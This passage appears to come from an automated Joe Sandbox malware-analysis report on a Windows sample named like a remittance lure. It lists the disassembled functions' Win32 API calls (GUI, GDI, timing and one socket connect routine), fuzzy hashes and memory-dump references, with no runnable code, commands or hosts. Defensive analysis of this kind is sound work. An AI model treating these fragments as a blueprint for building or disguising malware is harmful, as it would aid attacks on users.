                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: RectWindow
                                                                      • String ID:
                                                                      • API String ID: 861336768-0
                                                                      • Opcode ID: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                                      • Instruction ID: 0a42da3bb0701689e96ef39581243ed39d97d4ba46bd7cd8c1f057aae640e0d3
                                                                      • Opcode Fuzzy Hash: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                                      • Instruction Fuzzy Hash: E531EA7160021EAFDB00DF68D988AAE77A5EB49324F11C62AFD24E7380D774EC11CB90
                                                                      APIs
                                                                      • SendMessageW.USER32 ref: 00449598
                                                                        • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                                      • SendMessageW.USER32(?,00001074,?,?), ref: 004495F8
                                                                      • _wcslen.LIBCMT ref: 0044960D
                                                                      • _wcslen.LIBCMT ref: 0044961A
                                                                      • SendMessageW.USER32(?,00001074,?,?), ref: 0044964E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$_wcslen$_wcspbrk
                                                                      • String ID:
                                                                      • API String ID: 1856069659-0
                                                                      • Opcode ID: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                                      • Instruction ID: 683be220b4a5e9d86ccbf412c3bd2f13dbb60120779f28b1c577ab6eeef24407
                                                                      • Opcode Fuzzy Hash: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                                      • Instruction Fuzzy Hash: 77318F71A00218ABEB20DF59DC80BDFB374FF94314F10466AFA0497280E7B59D958B94
                                                                      APIs
                                                                      • GetCursorPos.USER32(?), ref: 004478E2
                                                                      • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
                                                                      • DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
                                                                      • GetCursorPos.USER32(00000000), ref: 0044796A
                                                                      • TrackPopupMenuEx.USER32(009B6430,00000000,00000000,?,?,00000000), ref: 00447991
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: CursorMenuPopupTrack$Proc
                                                                      • String ID:
                                                                      • API String ID: 1300944170-0
                                                                      • Opcode ID: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                                      • Instruction ID: 8079d3ea29232e2d8a780d7c6517a0c600664366e77620ab1eef72d1e193e80f
                                                                      • Opcode Fuzzy Hash: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                                      • Instruction Fuzzy Hash: EF31CF75600108AFE724CF59DC88FABB768EB89310F20455AF94587391C775AC53CBA8
                                                                      APIs
                                                                      • GetClientRect.USER32(?,?), ref: 004479CC
                                                                      • GetCursorPos.USER32(?), ref: 004479D7
                                                                      • ScreenToClient.USER32(?,?), ref: 004479F3
                                                                      • WindowFromPoint.USER32(?,?), ref: 00447A34
                                                                      • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Client$CursorFromPointProcRectScreenWindow
                                                                      • String ID:
                                                                      • API String ID: 1822080540-0
                                                                      • Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                                      • Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
                                                                      • Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                                      • Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
                                                                      APIs
                                                                      • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                                      • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                                      • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                                      • EndPaint.USER32(?,?), ref: 00447D13
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: ClientPaintRectRectangleScreenViewportWindow
                                                                      • String ID:
                                                                      • API String ID: 659298297-0
                                                                      • Opcode ID: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                                      • Instruction ID: 3c0582d8bc81ba5dadaaf244cb1f1d3939805113443e317e1f98b5bdeebaec33
                                                                      • Opcode Fuzzy Hash: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                                      • Instruction Fuzzy Hash: C33161706043019FE310CF25D8C8F7B7BE8EB86724F144A6EF9A5872A1C774A845DB69
                                                                      APIs
                                                                      • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                      • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                      • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                      • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                      • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                        • Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
                                                                        • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
                                                                        • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
                                                                        • Part of subcall function 00440D98: SendMessageW.USER32(009B1B98,000000F1,00000000,00000000), ref: 00440E6E
                                                                        • Part of subcall function 00440D98: SendMessageW.USER32(009B1B98,000000F1,00000001,00000000), ref: 00440E9A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Window$EnableMessageSend$LongShow
                                                                      • String ID:
                                                                      • API String ID: 142311417-0
                                                                      • Opcode ID: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                                      • Instruction ID: c941ec4e4e3d0536419715940b2668e48b64c275bb9f23e9dd6fd7b29375311a
                                                                      • Opcode Fuzzy Hash: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                                      • Instruction Fuzzy Hash: DE21F7B17443805BF7258E24CCC4BAFB7D0EF56345F08482EF98196391DBACA885C75A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                                      • Instruction ID: af34b986bc09d21a6a739d25b45c5a22770885c200d938a8bd6fc5fff5094107
                                                                      • Opcode Fuzzy Hash: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                                      • Instruction Fuzzy Hash: 5921AE75200600DBC710EF29E9D496B77B9EF49362B00466EFE5197392DB34EC09CB69
                                                                      APIs
                                                                      • IsWindowVisible.USER32(?), ref: 00445879
                                                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
                                                                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
                                                                      • _wcslen.LIBCMT ref: 004458FB
                                                                      • CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                                                      • String ID:
                                                                      • API String ID: 3087257052-0
                                                                      • Opcode ID: 622372a4a32610ce73fb3647056b26e365a1681bd10d6cc102ac189a3bd4553b
                                                                      • Instruction ID: ced771b0f23340e5f55e8fdbc4e1763ce6d97a07fd0b425722e47bce61cb145a
                                                                      • Opcode Fuzzy Hash: 622372a4a32610ce73fb3647056b26e365a1681bd10d6cc102ac189a3bd4553b
                                                                      • Instruction Fuzzy Hash: F51136726009017BFB10AB25DC06F9FB78CAF65360F04403AF909D7241EB69ED5983A9
                                                                      APIs
                                                                        • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                                      • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 004653FE
                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 0046540D
                                                                      • connect.WSOCK32(00000000,?,00000010), ref: 00465446
                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 0046546D
                                                                      • closesocket.WSOCK32(00000000,00000000), ref: 00465481
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                                                      • String ID:
                                                                      • API String ID: 245547762-0
                                                                      • Opcode ID: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                                      • Instruction ID: 0a95abeaf907522bb910ccff47ca5b8cdb65f95d12881c86cce1eb50970c9d0a
                                                                      • Opcode Fuzzy Hash: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                                      • Instruction Fuzzy Hash: E921F032200510ABD310EF29DC49F6EB7E8EF44725F008A6FF844E72D1DBB4A8418B99
                                                                      APIs
                                                                      • DeleteObject.GDI32(00000000), ref: 004471D8
                                                                      • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                      • SelectObject.GDI32(?,00000000), ref: 00447228
                                                                      • BeginPath.GDI32(?), ref: 0044723D
                                                                      • SelectObject.GDI32(?,00000000), ref: 00447266
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Object$Select$BeginCreateDeletePath
                                                                      • String ID:
                                                                      • API String ID: 2338827641-0
                                                                      • Opcode ID: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                                      • Instruction ID: fd3aca4fc88a528095528039be3f852d236b7ebb9f74560e76bd8f11b15fbd2f
                                                                      • Opcode Fuzzy Hash: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                                      • Instruction Fuzzy Hash: 92214F71905204AFEB10DF689D48A9E7FACFB16310F14466BF910D32A1DBB49C85CBAD
                                                                      APIs
                                                                      • Sleep.KERNEL32(00000000), ref: 00434598
                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
                                                                      • Sleep.KERNEL32(00000000), ref: 004345D4
                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: CounterPerformanceQuerySleep
                                                                      • String ID:
                                                                      • API String ID: 2875609808-0
                                                                      • Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                                      • Instruction ID: a92d15520113c221d818f77e193bed66bb4dcccdbbd961c90b57f37ba003579f
                                                                      • Opcode Fuzzy Hash: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                                      • Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00460C17
                                                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
                                                                      • MessageBeep.USER32(00000000), ref: 00460C46
                                                                      • KillTimer.USER32(?,0000040A), ref: 00460C68
                                                                      • EndDialog.USER32(?,00000001), ref: 00460C83
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                      • String ID:
                                                                      • API String ID: 3741023627-0
                                                                      • Opcode ID: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                                      • Instruction ID: 069ac2582a8c3c153a507cef710a9e07e91c6f457c78871e3a9641c65eda6ae6
                                                                      • Opcode Fuzzy Hash: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                                      • Instruction Fuzzy Hash: AB01DD315403086BE7349B54EE8DBDB737CFB14705F00465FB645921C0E7F4A9948B95
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Destroy$DeleteObjectWindow$Icon
                                                                      • String ID:
                                                                      • API String ID: 4023252218-0
                                                                      • Opcode ID: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                                      • Instruction ID: b4c4dbb9b59ba1bd7f08d964dfa6937d7ad9fb038e30cf105cf785d591c64ca0
                                                                      • Opcode Fuzzy Hash: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                                      • Instruction Fuzzy Hash: D5014870301A01DBDB10EF65E9D8A2B77A8BF48762F10462AFD04D7352D739D849CBA9
                                                                      APIs
                                                                      • SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
                                                                      • DeleteObject.GDI32(?), ref: 00455736
                                                                      • DeleteObject.GDI32(?), ref: 00455744
                                                                      • DestroyIcon.USER32(?), ref: 00455752
                                                                      • DestroyWindow.USER32(?), ref: 00455760
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: DeleteDestroyObject$IconMessageSendWindow
                                                                      • String ID:
                                                                      • API String ID: 1489400265-0
                                                                      • Opcode ID: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                                      • Instruction ID: 3262712e9a8127eed33bb9eb3d9864066e7dde5d47db0d590f2b6463dd6d37f9
                                                                      • Opcode Fuzzy Hash: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                                      • Instruction Fuzzy Hash: 07017C74300601DBCB10EF25EEC8A2A73A8BF48712F004569FE019B286D778DC49CB68
                                                                      APIs
                                                                        • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                                      • DestroyWindow.USER32(?), ref: 00455728
                                                                      • DeleteObject.GDI32(?), ref: 00455736
                                                                      • DeleteObject.GDI32(?), ref: 00455744
                                                                      • DestroyIcon.USER32(?), ref: 00455752
                                                                      • DestroyWindow.USER32(?), ref: 00455760
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                                                                      • String ID:
                                                                      • API String ID: 1042038666-0
                                                                      • Opcode ID: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                                      • Instruction ID: 2016740d4609c4bbd0e5f1cf6dc7522ca00853e433b5032f7809eda0dc31aff9
